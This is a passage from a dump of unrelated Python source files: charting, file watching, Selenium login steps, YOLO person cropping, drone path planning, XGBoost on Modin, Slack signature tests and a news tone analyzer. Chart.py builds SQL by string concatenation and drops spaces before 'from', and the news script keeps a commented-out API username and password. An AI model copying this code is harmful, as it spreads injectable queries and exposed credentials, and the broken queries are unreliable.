chart\")\n\t\t\tchart.render_to_png(path)\n\t\t\treturn\n\t\tchart = chart.render_data_uri()\n\t\tprint('chart rendered')\n\t\treturn chart\n\t\t\n\tdef make_Month_Chart(self, month, year, path=''):\n\t\tquery = (\"select date(date), round(avg(temp_out), 1), round(avg(temp_in), 1)\"\n\t\t\t\t \"from temperature \" \n\t\t\t\t \"where MONTH(date) = '\" + str(month) + \"' AND YEAR(date) ='\" + str(year) + \"'\"\n\t\t\t\t \"group by date(date)\")\n\t\tresults = self.db.execute_Query(query)\n\t\tchart = pygal.DateLine(x_label_rotation=20,interpolate='cubic', style=self.custom_Style,\n\t\t\t\t\t\t\t\t x_value_formatter=lambda dt: dt.strftime(\"%d-%m-%Y\"), fill=True)\n\t\t\n\t\tchart.title = \"Month: %s-%s\" % (year, month)\n\t\thome = [[r[0], r[2]] for r in results]\n\t\toutside = [[r[0], r[1]] for r in results]\n\t\tchart.add('Home average', home)\n\t\tchart.add('Outside average', outside)\n\t\t\n\t\tif path:\n\t\t\tprint(\"try to save chart\")\n\t\t\tchart.render_to_png(path)\n\t\t\treturn\n\t\t\n\t\tchart = chart.render_data_uri()\n\t\treturn chart\n\t\t\n\tdef make_Year_Chart(self, year, path='', sort='avg'):\n\t\tif sort == 'avg':\n\t\t\tquery = \"select weekofyear(date), round(avg(temp_in),1), round(avg(temp_out),1)\"\n\t\telif sort == \"max\":\n\t\t\tquery = \"select weekofyear(date), round(max(temp_in),1), round(max(temp_out),1)\" \n\t\telse:\n\t\t\tquery = \"select weekofyear(date), round(min(temp_in),1), round(min(temp_out),1)\"\n\t\tquery += (\"from temperature \"\n\t\t\t\t \"where year(date) = '\" + str(year) + \"' \"\n\t\t\t\t \"group by weekofyear(date)\")\n\t\tresults = self.db.execute_Query(query)\n\t\tchart = pygal.Line(x_label_rotation=25,interpolate='cubic',style=self.custom_Style, fill=True)\n\t\tchart.title = \"Year: %s\" % (year)\n\t\tchart.x_labels = ['Week' + str(r[0]) for r in results]\n\t\t\n\t\tif sort == 'avg':\n\t\t\thome = \"Home average\"\n\t\t\tout = \"Outside average\"\n\t\telif sort == 'max':\n\t\t\thome = \"Home max\"\n\t\t\tout = \"Outside max\"\n\t\telse:\n\t\t\thome = \"Home min\"\n\t\t\tout = \"Outside min\"\t\n\t\t\n\t\tchart.add(home, [r[1] for r in results])\n\t\tchart.add(out, [r[2] for r in results])\n\t\t\t\n\t\tif path:\n\t\t\tprint(\"try to save chart\")\n\t\t\tchart.render_to_png(path)\n\t\t\treturn\n\t\t\t\n\t\tchart = chart.render_data_uri()\n\t\treturn chart\n","sub_path":"pyweb/data/Chart.py","file_name":"Chart.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"189364940","text":"from watchdog.observers import Observer\nimport time\nfrom watchdog.events import FileSystemEventHandler\nimport os\n\nclass MyHandler(FileSystemEventHandler):\n print('Hi')\n i = 1\n def on_modified(self,event):\n print('hi1')\n for filename in os.listdir(folder_to_track):\n src = folder_to_track + \"/\" + filename\n new_destination = folder_destination + \"/\" + filename\n print(src,new_destination)\n os.rename(src, new_destination)\n print('hi2')\n\nfolder_destination = '/Users/Utkarsh GuptA/Desktop/IB/destination'\nfolder_to_track = '/Users/Utkarsh GuptA/Desktop/IB/source'\nevent_handler = MyHandler()\nprint('hi4')\nobserver = Observer()\nprint('hi5')\nobserver.schedule(event_handler, folder_to_track, recursive = True)\nprint('hi4=6')\nobserver.start()\n\ntry:\n while True:\n time.sleep(10)\nexcept KeyboardInterrupt():\n observer.stop()\nobserver.join()\n","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"107104707","text":"import allure\nimport pytest\nfrom selenium.webdriver.common.by import By\nfrom Locators import LoginPageLocators\nfrom Pages.LoginPageObjects import LoginPage\nfrom Utils import Attachments, Urls, Waits, Params\n\n\n@pytest.mark.usefixtures(\"driver\")\n@allure.MASTER_HELPER.BLOCKER\ndef login_as_customer(driver):\n page = LoginPage(driver)\n driver.get(Urls.base_url + \"/\")\n with allure.MASTER_HELPER.step(\"Click login\"):\n Attachments.screenshot(driver)\n page.login.click()\n\n Waits.until_element_will_clickable(driver, By.XPATH, LoginPageLocators.link_customer)\n with allure.MASTER_HELPER.step(\"Login Modal Form\"):\n Attachments.screenshot(driver)\n page.link_customer.click()\n\n Waits.until_element_will_clickable(driver, By.ID, LoginPageLocators.customer_login_phone_id)\n with allure.MASTER_HELPER.step(\"Fill in phone number\"):\n Attachments.screenshot(driver)\n page.phone_number.clear()\n page.phone_number.send_keys(Params.phone_number_value)\n page.button_confirm.click()\n\n Waits.until_element_will_clickable(driver, By.ID, LoginPageLocators.customer_login_sms_code)\n with allure.MASTER_HELPER.step(\"Fill in sms code\"):\n Attachments.screenshot(driver)\n page.sms_code.clear()\n page.sms_code.send_keys(Params.sms_code_value)\n page.button_confirm2.click()\n\n\n@allure.MASTER_HELPER.BLOCKER\ndef login_as_business(driver):\n page = LoginPage(driver)\n driver.get(Urls.base_url + \"/\")\n with allure.MASTER_HELPER.step(\"Click login\"):\n Attachments.screenshot(driver)\n page.login.click()\n\n Waits.until_element_will_clickable(driver, By.XPATH, LoginPageLocators.link_business)\n page.link_business.click()\n\n Waits.until_element_will_clickable(driver, By.XPATH, LoginPageLocators.button_confirm_business)\n with allure.MASTER_HELPER.step(\"Fill in authorization fields\"):\n Attachments.screenshot(driver)\n page.email_input.clear()\n page.email_input.send_keys(Params.email_value)\n page.password_input.clear()\n page.password_input.send_keys(Params.password_value)\n page.button_confirm_business_login.click()\n","sub_path":"Steps/LoginSteps.py","file_name":"LoginSteps.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"327729181","text":"#python libraries\nimport cv2\nimport numpy as np\nimport argparse\nimport os\n\n#chainer\nfrom chainer import serializers, Variable\nimport chainer.functions as F\n\n#python scripts\nfrom yolov2 import *\nfrom CocoPredictor import *\n\n\n# save label list\ndef save_label_list(label_list,file_address_name):\n\n f = open(file_address_name,'w')\n for label in label_list:\n f.write(str(label) + '\\n')\n\n\n#main\nif __name__ == \"__main__\":\n\n #video_path = '../../dataset/videos/gairan_1/camera_1.avi'\n #save_path = '../../dataset/images/overlaped/2017_08_18/for_training/humans/11/'\n\n parser = argparse.ArgumentParser(description='extract person images')\n parser.add_argument('--video_path', '-v', type=str, default=False,help='path to video')\n parser.add_argument('--save_no', '-s', type=int, default=False,help='save directory number')\n args = parser.parse_args()\n\n video_path = args.video_path\n save_path = '../../dataset/images/overlaped/2017_08_18/for_training/humans/'+str(args.save_no)+'/'\n\n cap = cv2.VideoCapture(video_path)\n\n if not os.path.isdir(save_path):\n os.makedirs(save_path)\n\n coco_predictor = CocoPredictor()\n\n frame_cnt = 0\n person_cnt = 0\n\n person_label = []\n\n cv2.namedWindow(\"video\", cv2.WINDOW_NORMAL)\n\n while(True):\n\n ret, frame = cap.read()\n frame_cnt += 1\n\n if ret is not True:\n break\n\n nms_results = coco_predictor(frame)\n\n for result in nms_results:\n\n left, top = result[\"box\"].int_left_top()\n\n right, bottom = result[\"box\"].int_right_bottom()\n\n if result[\"class_id\"] == 0:\n\n x1, y1 = result[\"box\"].int_left_top()\n x2, y2 = result[\"box\"].int_right_bottom()\n\n cv2.imwrite(save_path+str(person_cnt)+'.jpg', frame[y1:y2, x1:x2])\n\n cv2.rectangle(frame, (x1, y1), (x2, y2), (255, 0, 255), 3)\n text = '%s(%2d%%)' % (result[\"label\"], result[\"probs\"].max()*result[\"conf\"]*100)\n print(text)\n cv2.putText(frame, text, (left, top-7), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 2)\n\n person_label.append(0)\n person_cnt += 1\n\n cv2.imshow(\"video\", frame)\n\n key = cv2.waitKey(1) & 0xFF\n\n if key == 27:\n break\n\n cap.release()\n\n #save_label_list(person_label, save_path+'labels.txt')\n print(frame_cnt)\n print(person_cnt)\n print(len(person_label))\n","sub_path":"YOLOv2/yolov2_prediction_find_person.py","file_name":"yolov2_prediction_find_person.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"392743753","text":"# -*- coding:utf-8 -*-\nimport sys\nimport optparse\nimport os\n\n\ndef print_usage(option, opt, value, parser):\n usage_message = \"\"\"\n# --------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------------------------------------------------------------\n python write_cnv_frequency.py -p /path/to/work --overlap 0.7 --cnv /cnv/info/path\n# --------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------------------------------------------------------------\n \"\"\"\n print(usage_message)\n sys.exit()\n\n\ndef write_cnv_freq_sh(wkdir, per, cnv_info_path):\n chroms = [\"chr\" + str(i) for i in range(1, 23)] + [\"chrX\", \"chrY\"]\n cnv_type = [\"deletion\", \"duplication\"]\n python = \"python\"\n py = \"cnvnator_cnv_frequency.py\"\n for chrom in chroms:\n path = os.path.join(wkdir, chrom)\n if not os.path.exists(path):\n os.makedirs(path + \"/deletion/scripts\")\n os.makedirs(path + \"/duplication/scripts\")\n for ct in cnv_type:\n fp = open(path + \"/\" + ct + \"/scripts/\" + chrom + \".sh\", \"w\")\n shell = '''#!/bin/bash\n{python} {py} -p {path}/{ct} -o {wkdir}/{chrom}.{ct}.cnv.freq.txt --overlap {per} --cnv_type {ct} --cnv {cnv_info_path}/cnv.info.{chrom}.list\n'''.format(**locals())\n fp.write(shell)\n fp.close()\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('-u', '--usage', help='print more info on how to use this script', action=\"callback\", callback=print_usage)\n parser.add_option('--cnv', dest='cnv', default=None, type='string')\n parser.add_option('-p', '--pwd', dest='pwd', default=None, type='string')\n parser.add_option('--overlap', dest='overlap', type=float)\n (opts, args) = parser.parse_args()\n cnv = opts.cnv\n pwd = opts.pwd\n overlap = opts.overlap\n write_cnv_freq_sh(pwd, overlap, cnv)\n","sub_path":"write_cnv_frequency.py","file_name":"write_cnv_frequency.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508877919","text":"from matplotlib import pyplot as plt\nfrom shapely.geometry import Point, Polygon\nimport shapefile\nimport numpy as np\nimport node\nimport geopy.distance as distance\n\ndrones = 5\n\npolygon = None\npoly_points = None\n\n\ndef line_intersection(l1, l2):\n dx = (l1[0][0] - l1[1][0], l2[0][0] - l2[1][0])\n dy = (l1[0][1] - l1[1][1], l2[0][1] - l2[1][1])\n\n def det(a, b):\n return a[0] * b[1] - a[1] * b[0]\n\n div = det(dx, dy)\n if div == 0:\n print('lines do not intersect')\n\n d = (det(*l1), det(*l2))\n x = det(d, dx) / div\n y = det(d, dy) / div\n return x, y\n\n\nsf = shapefile.Reader(\"shapefiles/dyp\")\nfor shape in list(sf.iterShapes()):\n npoints=len(shape.points) # total points\n nparts = len(shape.parts) # total parts\n polygon = Polygon(shape.points)\n poly_points = shape.points\n if nparts == 1:\n x_lon = np.zeros((len(shape.points),1))\n y_lat = np.zeros((len(shape.points),1))\n for ip in range(len(shape.points)):\n x_lon[ip] = shape.points[ip][0]\n y_lat[ip] = shape.points[ip][1]\n #plt.plot(x_lon, y_lat)\n\nx_min, y_min, x_max, y_max = polygon.bounds\nprint(polygon.length * 20)\nbitmap = []\nrow = []\nx_range = np.arange(x_min, x_max, 0.0001)\ny_range = np.arange(y_min, y_max, 0.0001)\nfor j in range(0, len(y_range)):\n row = []\n for i in range(0, len(x_range)):\n point = None\n if polygon.contains(Point(x_range[i], y_range[j])):\n plt.scatter(x_range[i], y_range[j], s =.5, c='blue')\n point = node.Node(x_range[i], y_range[j], \"In\")\n else:\n plt.scatter(x_range[i], y_range[j], s=.5, c='yellow')\n point = node.Node(x_range[i], y_range[j], \"Out\")\n row.append(point)\n bitmap.append(row)\n\nshape = np.array(bitmap).shape\n\n# for x in range(0, shape[0]):\n# for y in range(0, shape[1]):\n# if bitmap[x][y].get_state() == \"Out\":\n# try:\n# if bitmap[x+1][y].get_state() == \"In\":\n# if (bitmap[x+1][y-1].get_state() == \"In\" and bitmap[x][y-1].get_state() == \"In\") or (bitmap[x+1][y+1].get_state() == \"In\" and bitmap[x][y+1].get_state() == \"In\"):\n# bitmap[x][y].set_state(\"Partial\")\n# elif bitmap[x-1][y].get_state():\n# if (bitmap[x-1][y-1].get_state() == \"In\" and bitmap[x][y-1].get_state() == \"In\") or (bitmap[x-1][y+1].get_state() == \"In\" and bitmap[x][y+1].get_state() == \"In\"):\n# bitmap[x][y].set_state(\"Partial\")\n# except:\n# pass\n\nx_array = []\ny_array = []\nfor e,x in enumerate(bitmap):\n row = []\n for y in x:\n if y.get_state() in [\"In\", \"Partial\"]:\n row.append(y)\n if e % 2 != 0:\n row.reverse()\n\n for i in row:\n temp = i.get_points()\n x_array.append(temp[0])\n y_array.append(temp[1])\nindex = len(x_array)\ncal = []\nfor i in range(0,len(poly_points)-1):\n result = filter(lambda x: (x <= poly_points[i][1] and x >= poly_points[i+1][1]) or (x >= poly_points[i][1] and x <= poly_points[i+1][1]), y_range)\n for line in result:\n pt = line_intersection((poly_points[i],poly_points[i+1]),((0,line),(x_max,line)))\n cal.append(pt)\n x_array.insert(index, pt[0])\n y_array.insert(index, pt[1])\n\n\n\ntotal_length = 0\nfor i in range(0, len(x_array)-1):\n total_length += distance.vincenty((x_array[i],y_array[i]), ((x_array[i+1],y_array[i+1]))).m\n\npart = total_length/drones\nprint(part)\nclr = ['red', 'orange', 'cyan', 'green', 'coral' ]\n\nx_array.reverse()\ny_array.reverse()\n\ni = 0;\npath_x = [x_array[i]]\npath_y = [y_array[i]]\ntd = 0\ninfo = []\nclr = ['red','blue','cyan','coral','orange']\nfor j in range(0, drones):\n while td <= part and i < len(x_array)-1:\n td += distance.vincenty((x_array[i],y_array[i]), ((x_array[i+1],y_array[i+1]))).m\n i += 1\n path_x.append(x_array[i])\n path_y.append(y_array[i])\n plt.plot(path_x, path_y,color=clr[j])\n d = dict(drone=j+1, distance=td, color=clr[j])\n path_y = [y_array[i]]\n path_x = [x_array[i]]\n info.append(d)\n td = 0\nplt.show()\n[print(x) for x in info]","sub_path":"get_points.py","file_name":"get_points.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"472897069","text":"from pandas_datareader import data as web\nimport datetime\nimport pandas as pd\n\n#Initialize variables\nstart = datetime.datetime(2004,4,19)\nend = datetime.datetime(2016,2,1)\n\n#Load data\nAAPL = web.DataReader('AAPL', 'google', start, end)['Close']\nGOOGL = web.DataReader('GOOGL', 'google', start, end)['Close']\n\n#Get percentage change\nAAPL_1_DAY_RETS = AAPL.pct_change(1)\nGOOGL_1_DAY_RETS = GOOGL.pct_change(1)\n\n#Compute and plot one year moving correlation\npd.rolling_corr(AAPL_1_DAY_RETS, GOOGL_1_DAY_RETS, 250).plot()\n\n\n#Least-squares regression\nmodel = pd.ols(y=AAPL_1_DAY_RETS, x={'GOOGL':GOOGL_1_DAY_RETS}, window=250)\n\n#Plot one year beta OLS regression coefficient\nmodel.beta['GOOGL'].plot()\n","sub_path":"rollingCorrelation.py","file_name":"rollingCorrelation.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545142550","text":"import unittest\n\nfrom slack_sdk.signature import SignatureVerifier\n\n\nclass MockClock:\n def now(self) -> float:\n return 1531420618\n\n\nclass TestSignatureVerifier(unittest.TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n # https://api.slack.com/authentication/verifying-requests-from-slack\n signing_secret = \"8f742231b10e8888abcd99yyyzzz85a5\"\n\n body = \"token=xyzz0WbapA4vBCDEFasx0q6G&team_id=T1DC2JH3J&team_domain=testteamnow&channel_id=G8PSS9T3V&channel_name=foobar&user_id=U2CERLKJA&user_name=roadrunner&command=%2Fwebhook-collect&text=&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT1DC2JH3J%2F397700885554%2F96rGlfmibIGlgcZRskXaIFfN&trigger_id=398738663015.47445629121.803a0bc887a14d10d2c447fce8b6703c\"\n\n timestamp = \"1531420618\"\n valid_signature = (\n \"v0=a2114d57b48eac39b9ad189dd8316235a7b4a8d21a10bd27519666489c69b503\"\n )\n\n headers = {\n \"X-Slack-Request-Timestamp\": timestamp,\n \"X-Slack-Signature\": valid_signature,\n }\n\n def test_generate_signature(self):\n verifier = SignatureVerifier(self.signing_secret)\n signature = verifier.generate_signature(\n timestamp=self.timestamp, body=self.body\n )\n self.assertEqual(self.valid_signature, signature)\n\n def test_generate_signature_body_as_bytes(self):\n verifier = SignatureVerifier(self.signing_secret)\n signature = verifier.generate_signature(\n timestamp=self.timestamp, body=self.body.encode(\"utf-8\")\n )\n self.assertEqual(self.valid_signature, signature)\n\n def test_is_valid_request(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret, clock=MockClock()\n )\n self.assertTrue(verifier.is_valid_request(self.body, self.headers))\n\n def test_is_valid_request_body_as_bytes(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret, clock=MockClock()\n )\n self.assertTrue(\n verifier.is_valid_request(self.body.encode(\"utf-8\"), self.headers)\n )\n\n def test_is_valid_request_invalid_body(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n modified_body = self.body + \"------\"\n self.assertFalse(verifier.is_valid_request(modified_body, self.headers))\n\n def test_is_valid_request_invalid_body_as_bytes(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n modified_body = self.body + \"------\"\n self.assertFalse(\n verifier.is_valid_request(modified_body.encode(\"utf-8\"), self.headers)\n )\n\n def test_is_valid_request_expiration(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n )\n self.assertFalse(verifier.is_valid_request(self.body, self.headers))\n\n def test_is_valid_request_none(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n self.assertFalse(verifier.is_valid_request(None, self.headers))\n self.assertFalse(verifier.is_valid_request(self.body, None))\n self.assertFalse(verifier.is_valid_request(None, None))\n\n def test_is_valid(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n self.assertTrue(\n verifier.is_valid(self.body, self.timestamp, self.valid_signature)\n )\n self.assertTrue(verifier.is_valid(self.body, 1531420618, self.valid_signature))\n\n def test_is_valid_none(self):\n verifier = SignatureVerifier(\n signing_secret=self.signing_secret,\n clock=MockClock(),\n )\n self.assertFalse(verifier.is_valid(None, self.timestamp, self.valid_signature))\n self.assertFalse(verifier.is_valid(self.body, None, self.valid_signature))\n self.assertFalse(verifier.is_valid(self.body, self.timestamp, None))\n self.assertFalse(verifier.is_valid(None, None, self.valid_signature))\n self.assertFalse(verifier.is_valid(None, self.timestamp, None))\n self.assertFalse(verifier.is_valid(self.body, None, None))\n self.assertFalse(verifier.is_valid(None, None, None))\n","sub_path":"tests/slack_sdk/signature/test_signature_verifier.py","file_name":"test_signature_verifier.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"274744645","text":"import cv2\nprint(cv2.__version__)\ndispW =1280\ndispH =960\nflip =2\n#camSet='nvarguscamerasrc ! video/x-raw(memory:NVMM), width=3264, height=2464, format=NV12, framerate=21/1 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(dispW)+', height='+str(dispH)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink'\n#cam = cv2.VideoCapture(camset) for raspberry pi camera\ncam = cv2.VideoCapture('/dev/video0')\ndispW =int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))\ndispH =int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))\nBW = int(0.3*dispW)\nBH = int(0.2*dispH)\n\nposX =10\nposY =270\ndx =3\ndy =2\n\nwhile True:\n ret, frame = cam.read()\n \n roi =frame[posY:posY+BH,posX:posX+BW].copy()\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n frame = cv2.cvtColor(frame,cv2.COLOR_GRAY2BGR)\n frame[posY:posY+BH,posX:posX+BW] = roi\n cv2.rectangle(frame,(posX,posY),(posX+BW,posY+BH),(255,0,0),3)\n posX = posX + dx\n posY = posY + dy\n if posX<=0 or posX +BW >= dispW:\n dx =dx*(-1)\n if posY <= 0 or posY +BH >= dispH:\n dy =dy*(-1)\n cv2.imshow(\"Gray_roi\",frame)\n cv2.moveWindow(\"Gray_roi\",0,0)\n\n if cv2.waitKey(1)==ord('q'):\n break\n\ncam.release()\ncv2.destroyAllWindows()\n\n# the IDE might not respond always, close the idea and start again","sub_path":"Opencv10-colour_bouncing_on_gray.py","file_name":"Opencv10-colour_bouncing_on_gray.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347001448","text":"import os\nfrom distutils.core import setup\n\nversion = '0.1.1'\nREADME = os.path.join(os.path.dirname(__file__), 'README.md')\nlong_description = open(README).read()\nsetup(name='yt_interaction',\n version=version,\n description=(\"Interaction in yt via HoloViews\"),\n long_description=long_description,\n classifiers=[\n \"Programming Language :: Python\",\n (\"Topic :: Software Development :: Libraries :: Python Modules\"),\n ],\n keywords='data',\n author='Matthew Turk ',\n license='BSD',\n package_dir={'yt_interaction':'yt_interaction'},\n packages=[\"yt_interaction\"],\n install_requires=[\"holoviews\"],\n url=\"http://bitbucket.org/data-exp-lab/yt_interaction/\",\n author_email=\"matthewturk@gmail.com\",\n)\n","sub_path":"pypi_install_script/yt_interaction-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58972864","text":"# Licensed to Modin Development Team under one or more contributor license agreements.\n# See the NOTICE file distributed with this work for additional information regarding\n# copyright ownership. The Modin Development Team licenses this file to you under the\n# Apache License, Version 2.0 (the \"License\"); you may not use this file except in\n# compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under\n# the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n\nimport logging\nfrom typing import Dict, Optional\nfrom multiprocessing import cpu_count\n\nimport xgboost as xgb\n\nfrom modin.config import Engine\n\nLOGGER = logging.getLogger(\"[modin.xgboost]\")\n\n\nclass ModinDMatrix(xgb.DMatrix):\n \"\"\"\n DMatrix holding on references to DataFrame.\n\n Parameters\n ----------\n data : DataFrame\n Data source of DMatrix.\n label : DataFrame\n Labels used for training.\n\n Notes\n -----\n Currently ModinDMatrix supports only `data` and `label` parameters.\n \"\"\"\n\n def __init__(self, data, label):\n self.data = data\n self.label = label\n\n def __iter__(self):\n yield self.data\n yield self.label\n\n\ndef train(\n params: Dict,\n dtrain: ModinDMatrix,\n *args,\n evals=(),\n nthread: Optional[int] = cpu_count(),\n evenly_data_distribution: Optional[bool] = True,\n **kwargs,\n):\n \"\"\"\n Train XGBoost model.\n\n Parameters\n ----------\n params : dict\n Booster params.\n dtrain : ModinDMatrix\n Data to be trained against.\n evals: list of pairs (ModinDMatrix, string)\n List of validation sets for which metrics will evaluated during training.\n Validation metrics will help us track the performance of the model.\n nthread : int\n Number of threads for using in each node. By default it is equal to\n number of threads on master node.\n evenly_data_distribution : boolean, default True\n Whether make evenly distribution of partitions between nodes or not.\n In case `False` minimal datatransfer between nodes will be provided\n but the data may not be evenly distributed.\n \\\\*\\\\*kwargs :\n Other parameters are the same as `xgboost.train` except for\n `evals_result`, which is returned as part of function return value\n instead of argument.\n\n Returns\n -------\n dict\n A dictionary containing trained booster and evaluation history.\n `history` field is the same as `eval_result` from `xgboost.train`.\n\n .. code-block:: python\n\n {'booster': xgboost.Booster,\n 'history': {'train': {'logloss': ['0.48253', '0.35953']},\n 'eval': {'logloss': ['0.480385', '0.357756']}}}\n \"\"\"\n LOGGER.info(\"Training started\")\n\n if Engine.get() == \"Ray\":\n from .xgboost_ray import _train\n else:\n raise ValueError(\"Current version supports only Ray engine.\")\n\n result = _train(\n dtrain, nthread, evenly_data_distribution, params, *args, evals=evals, **kwargs\n )\n LOGGER.info(\"Training finished\")\n return result\n\n\ndef predict(\n model,\n data: ModinDMatrix,\n nthread: Optional[int] = cpu_count(),\n evenly_data_distribution: Optional[bool] = True,\n **kwargs,\n):\n \"\"\"\n Run prediction with a trained booster.\n\n Parameters\n ----------\n model : A Booster or a dictionary returned by `modin.experimental.xgboost.train`.\n The trained model.\n data : ModinDMatrix.\n Input data used for prediction.\n nthread : int\n Number of threads for using in each node. By default it is equal to\n number of threads on master node.\n evenly_data_distribution : boolean, default True\n Whether make evenly distribution of partitions between nodes or not.\n In case `False` minimal datatransfer between nodes will be provided\n but the data may not be evenly distributed.\n\n Returns\n -------\n numpy.array\n Array with prediction results.\n \"\"\"\n LOGGER.info(\"Prediction started\")\n\n if Engine.get() == \"Ray\":\n from .xgboost_ray import _predict\n else:\n raise ValueError(\"Current version supports only Ray engine.\")\n\n if isinstance(model, xgb.Booster):\n booster = model\n elif isinstance(model, dict):\n booster = model[\"booster\"]\n else:\n raise TypeError(\n f\"Expected types for `model` xgb.Booster or dict, but presented type is {type(model)}\"\n )\n result = _predict(booster, data, nthread, evenly_data_distribution, **kwargs)\n LOGGER.info(\"Prediction finished\")\n\n return result\n","sub_path":"modin/experimental/xgboost/xgboost.py","file_name":"xgboost.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586865397","text":"from ..models.feed import Feed\nfrom ..models.archives import Archives\nfrom watson_developer_cloud import ToneAnalyzerV3\nfrom goose3 import Goose\nimport goose3\nimport requests\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sys import platform\nfrom .visuals import render_pie_charts\nimport os\nimport textstat\nimport json\n\n\ndef connect_to_db(db_path):\n \"\"\"This function creates an engine and a session.\n \"\"\"\n my_engine = create_engine(db_path)\n\n # create a configured \"Session\" class\n Session = sessionmaker(bind=my_engine)\n\n # create a Session\n return Session()\n\n\ndef get_news():\n \"\"\"Function that fetches 20 current headlines from the News API\n \"\"\"\n\n url = 'https://newsapi.org/v2/top-headlines?country=us&apiKey={}'.format(os.environ.get('NEWS_API_KEY'))\n response = requests.get(url)\n\n return response.json()['articles']\n\n\ndef extract_text(url):\n \"\"\"Function to extract text from article\n \"\"\"\n g = Goose()\n\n try:\n article = g.extract(url)\n except goose3.network.NetworkError:\n return False\n\n return article.cleaned_text\n\n\ndef analyze_text(text):\n # tone_analyzer = ToneAnalyzerV3(\n # version='2017-09-21',\n # username='637f0158-041b-45af-99c6-1035adfcb148',\n # password='fooszZRwri2t')\n\n tone_analyzer = ToneAnalyzerV3(\n version='2017-09-21',\n iam_apikey=os.environ.get('WATSON_KEY'),\n url='https://gateway.watsonplatform.net/tone-analyzer/api'\n )\n\n return tone_analyzer.tone(\n {'text': text},\n 'application/json')\n\n\ndef analyze_vocab(text):\n return {\n 'num_words':\n textstat.lexicon_count(text),\n 'flesch_reading_ease':\n textstat.flesch_reading_ease(text),\n 'smog_index':\n textstat.smog_index(text),\n 'flesch_kincaid_grade':\n textstat.flesch_kincaid_grade(text),\n 'coleman_liau_index':\n textstat.coleman_liau_index(text),\n 'automated_readability_index':\n textstat.automated_readability_index(text),\n 'dale_chall_readability_score':\n textstat.dale_chall_readability_score(text),\n 'difficult_words':\n textstat.difficult_words(text),\n 'linsear_write_formula':\n textstat.linsear_write_formula(text),\n 'gunning_fog':\n textstat.gunning_fog(text),\n 'text_standard':\n textstat.text_standard(text, float_output=True)\n }\n\n\n# TODO: This function is too long. Refactor further.\n\ndef job():\n \"\"\"Job to be scheduled for 3-step News Fetch/Extraction/Analyze.\n We can trigger at a specified interval (24-hour for demo purposes.\n 1-hr or less in true production)\n \"\"\"\n\n if platform == \"linux\" or platform == \"linux2\":\n db_path = os.environ.get('RDS_PATH')\n elif platform == \"darwin\":\n db_path = 'postgres://localhost:5432/news_api'\n\n session = connect_to_db(db_path)\n session.query(Feed).delete()\n session.commit()\n\n api_response = get_news()\n\n parsed_article_list = []\n\n for obj in api_response:\n parsed_article = {\n 'title': obj['title'],\n 'url': obj['url'],\n 'description': obj['description'],\n 'source': obj['source']['name'],\n 'date_published': obj['publishedAt'],\n 'image': obj['urlToImage'],\n }\n parsed_article_list.append(parsed_article)\n\n analyzed_articles = []\n\n for article in parsed_article_list:\n url = article['url']\n text = extract_text(url)\n if not text:\n continue\n\n vocab_analysis = analyze_vocab(text)\n tone_analysis = analyze_text(text).get_result()\n\n num_analyzed_sentences = 0\n sentence_breakdown = {\n 'Analytical': 0,\n 'Tentative': 0,\n 'Confident': 0,\n 'Joy': 0,\n 'Anger': 0,\n 'Fear': 0,\n 'Sadness': 0\n }\n if 'sentences_tone' in tone_analysis:\n for sentence in tone_analysis['sentences_tone']:\n if len(sentence['tones']):\n num_analyzed_sentences += 1\n dom_sentence_tone = sorted(\n sentence['tones'],\n key=lambda 